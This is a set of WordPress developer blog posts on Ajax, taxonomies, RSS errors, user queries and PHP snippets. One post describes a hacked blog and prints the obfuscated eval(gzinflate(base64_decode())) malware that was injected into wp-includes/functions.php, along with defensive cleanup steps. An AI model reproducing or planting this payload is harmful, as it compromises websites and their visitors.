Ajax call returns -1 in WordPress Plugin?

I came across this problem while developing a plugin for a client.

I made the Ajax call properly using the following code


	
	$( "#hform-leads" ).click( function()
	{	

              var username = $("#username").val();

		var data = {
				action: 'register_lead',
				username: username
			};
		
		jQuery.post("/wp-admin/admin-ajax.php", data, function(response) {
				alert( response );
			});
		

	});
	

and on the plugin file i used the following code:


add_action('wp_ajax_register_lead', 'exec_register_lead');

function exec_register_lead() 
	{

	  //my function code here
	
	}
 	

The code worked while i was logged in. Once i logged out it started returning “-1″ as the Ajax response.

After carefully going through WordPress documentation on Ajax calls i found that when you are logged out, you do not have privilege to call the Ajax script. To make it work, privilege must be given to the logged out users to execute the Ajax script from client side.

This is done by adding one more line below this line:

add_action(‘wp_ajax_register_lead’, ‘exec_register_lead’);

//add the following line

add_action(‘wp_ajax_nopriv_register_lead’, ‘exec_register_lead’);

WordPress Blog Hacked with Footer Spam Links (rankexplorer poker software)

One of my wordpress blogs got hacked last week with spam links. First i noticed a single link to a site rankexplorer.com with anchor text poker software – inserted at the bottom of my blog pages. The links increased to 20 when i did not take any action to remove them.

These spam links were driving me crazy as i tried all possible ways i found on the net and found no trace of these links – neither in files nor in wordpress database.

I deactivated all plugins one by one and after deactivating “members” plugin (by Justin Tadlock) the spam links were gone from home page – but still persisted on the other pages.

I searched through the wordpress database and core and theme folders with link urls, anchor text but found no reference. Then i remembered a similar hack discussed in a internet marketing forum about spammers using encoding to avoid detection.

I opened my core wordpress installation directory via FTP and arranged the files in descending order of modification. This gave me the recent date that a file was changed.

The core folder did not show any modified file in last 2 weeks. When i moved to wp-includes folder and again rearranged the files by modified date – the functions.php file popped to the top.

SinceĀ  i had not done any changes to any core files i was pretty sure that this must be the file which is compromised. I opened the file in dreamweaver and sure there it was – a large chunk of encoded junk at the top of the file, above the WordPress original code


$md5 = "ca8d6fe6ff7ff855deefebd16e95aa6b";
$wp_salt = array("_","b","t",'v',"(","f","l","c",'r','z',"e",'g',"s","6",'a',"i","4",'$',';',"n","o",")",'d');
$wp_add_filter = create_function('$'.'v',$wp_salt[10].$wp_salt[3].$wp_salt[14].$wp_salt[6].$wp_salt[4].$wp_salt[11].$wp_salt[9].$wp_salt[15].$wp_salt[19].$wp_salt[5].$wp_salt[6].$wp_salt[14].$wp_salt[2].$wp_salt[10].$wp_salt[4].$wp_salt[1].$wp_salt[14].$wp_salt[12].$wp_salt[10].$wp_salt[13].$wp_salt[16].$wp_salt[0].$wp_salt[22].$wp_salt[10].$wp_salt[7].$wp_salt[20].$wp_salt[22].$wp_salt[10].$wp_salt[4].$wp_salt[17].$wp_salt[3].$wp_salt[21].$wp_salt[21].$wp_salt[21].$wp_salt[18]);
$wp_add_filter('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');

I removed this block and updated the functions.php file and sure the spam links were gone!

Note that in my case it was a core wordpress file where the spam links were encoded. In another hacked site the location may be different. The spam links may come from a compromised theme file also.

The following steps will help you narrow down the list of files which you will need to check for any malicious code:

1. Deactivate any custom theme you might be using and activate the default wordpress twenty eleven theme. Then view source of your site pages to see if the links have disappeared. If the links are gone then your theme files are compromised. If the links persist then the core wordpress files are hacked.

2. Arrange the core wordpress files (or the theme files as the case may be) in descending order of modification date. The core files are not meant to be modified, and if you have not edited any core file yourself then any recently modified file may be the one containing the malicious code. Apply the same logic for theme files too.

I had a hard time finding and removing the spam links. Hope this article will save a bit of your time in keeping your blog clean.

 

How to Enable Custom Taxonomy Terms for Non-Admin users in WordPress

When you add custom taxonomy for your posts (including custom post types) – by default the taxonomy terms can be added and assigned from the post edit screen when you login as Admin (or as an editor).

But, if you are a subscriber or any other non-admin user, the custom taxonomies will be disabled (greyed out) when you edit a post(or custom post type) unless, you include certain information while registering the custom taxonomy. To make things easier, you will also need to install a robust plugin like members from a WordPress pro Justin Tadlock.

Say, i want to register a custom taxonomy ‘city’ for custom post type ‘club’. I will use the following code

 register_taxonomy( 'city',array (
0 = 'club',
				 ),
										array(
												'hierarchical' => true,
												'label' => 'Cities',
												'show_ui' => true,
												'query_var' => true,
												'rewrite' => array('slug' => 'city'),
												'singular_label' => 'City',
												'capabilities' => array(
																'manage_terms' => 'manage_categories',
																'edit_terms' => 'manage_categories',
																'delete_terms' => 'manage_categories',
																'assign_terms' => 'edit_clubs'
															),
											 )
								  );

This code goes straight to my functions.php theme file. This code is derived from wordpress codex.

Here, the most important lines that are required to get the custom taxonomies working is inside the ‘capabilities’ array.

‘manage_terms’ => ‘manage_categories’
‘edit_terms’ => ‘manage_categories’
‘delete_terms’ => ‘manage_categories’
‘assign_terms’ => ‘edit_clubs’

What the first 3 lines mean is – anyone with ‘manage_categories’ capability will be able to manage/edit/delete terms of the custom taxonomy. The fourth line means that anyone with ‘edit_clubs’ capability will be able to assign terms to posts(including custom post types) in edit screen.

To add capabilities to a user role you will need to write down some code yourself – which is time consuming and i would not elaborate here, or, you can use a robust role management plugin like members .

Download the members plugin from WordPress and install.

After activating the plugin you will see a new “Roles” menu under “Users” menu in your WordPress admin panel. Add new role and assign capabilities as you want. For the example above, i created a “promoter” role with capabilities ‘edit_clubs’, ‘delete_clubs’ and ‘publish_clubs’. The “edit_club” capability is mapped to “assign_terms” capability as shown above. This allowed all my registered users with a “promoter” role to login and assign cities for my custom taxonomy ‘city’.

Word Press Remove Blank Line From RSS Feed Error Fix

Are you pulling your hair out trying to solve this error? If you are not a geek then most probably you are doing just that!

This error is generated when the feed output generated by WordPress contains a blank space at the beginning of the output page.

The most common cause for this error is a blank space somewhere in between PHP tags in your theme’s functions.php file.

Look for PHP tags that contains a space like this:

Remove the blank space and the feed should work now.

If that did not work out you can try this neat wordpress plugin fix rss feed.

Another alternative is to disable all your plugins one by one and check out the feed output. If your feed starts working after deactivating a particular plugin, then check out the PHP functions in that plugin files. Here again, the main issue could be a gap between PHP tags as decribed above. Remove all such spaces. Since this requires knowledge of wordpress plugins, this method is not recommended for non-programmers.

Also, do not forget to back up your wordpress database and files before tampering with any plugin file.

If everything else fails – then hire an expensive programmer to do the task!

Do you have any other methods to solve this error? Please share in the comments below.

Get Users List by Role in WordPress

To get the list of all users in your wordpress blog use the following code:


<?php

	$users = get_users();

?>

This function returns an Array of user objects as follows:

Array
(
    [0] => stdClass Object
        (
            [ID] => 1
            [user_login] => admin
            [user_pass] => ***************************.
            [user_nicename] => admin
            [user_email] => admin@localhost.com
            [user_url] => 
            [user_registered] => 2011-06-25 18:05:28
            [user_activation_key] => 
            [user_status] => 0
            [display_name] => admin
        )

    [1] => stdClass Object
        (
            [ID] => 2
            [user_login] => seema
            [user_pass] => ***************************
            [user_nicename] => seema
            [user_email] => seema@localhost.com
            [user_url] => 
            [user_registered] => 2011-06-25 18:12:53
            [user_activation_key] => 
            [user_status] => 0
            [display_name] => seema
        )

)

You can use a foreach loop to extract the required user information.

For example – if you want to extract only the user names, you would do the following loop

<?php
    
     $users = get_users();

     foreach( $users as $user )
     {
	 	echo $user->user_nicename;
		
		echo '<br />';
        
     }
?>

The above code is fine as long as you want all users in your blog. But when you need users by roles, you will need to pass certain parameters to the function get_users();

Say, you want all users with the role “agent”. The following modified code will get you all the user from role agent

<?php

	$args['role'] = 'agent';
	
	$users = get_users( $args );
?>	

What we are doing here is passing an argument role to the get_users() function telling it to return only those users who belong to the role agent.

You can pass more arguments to the get_users() function to filter the returned users as per your requirements.

For a detailed list of arguments check out this article at wordpress codex

Note that this function is available from WordPress version 3.1 onwards.

What Every WordPress Plugin Developer Should Know

This is one excellent tutorial from smashingmagazine.com

In a nutshell following are the main points from this article

1. Turn on debugging feature before you start developing a plugin
2. Provide unique prefixes to your plugin function names
3. Create global paths for your CSS and JS code
4. Keep track of plugin version for upgrades
5. To create/update your plugin database tables use dbDelta() function
6. Know how and when to use actions and filters
7. Create your own settings page for your plugin

Full article at smashingmagazine

Generating a list of Random Numbers in PHP

I created the following code while working on a wordpress plugin. As usual, first i searched in Google for a short cut way to do this! Turned out, lots of people were having trouble generating a list of random numbers in PHP.

<?php

	$low = 1; //lowest number
	
	$high = 500; //highest number
	
	$not = true;

        $max = 5; //number of random numbers that you want
	
	$list = array();
	
	while( $not ) {
	
		$p = rand( $low, $high );
		
		if ( !in_array( $p, $list ) ){
		
			$list[] = $p;
		
		}		
		
		$count = count( $list );
		
		if ( $count == $max )
		{
			$not = false;
		}
		 
	} 
	
	foreach( $list as $val ){
		
		echo $val;
		
		echo "<br />";
	}
	
?>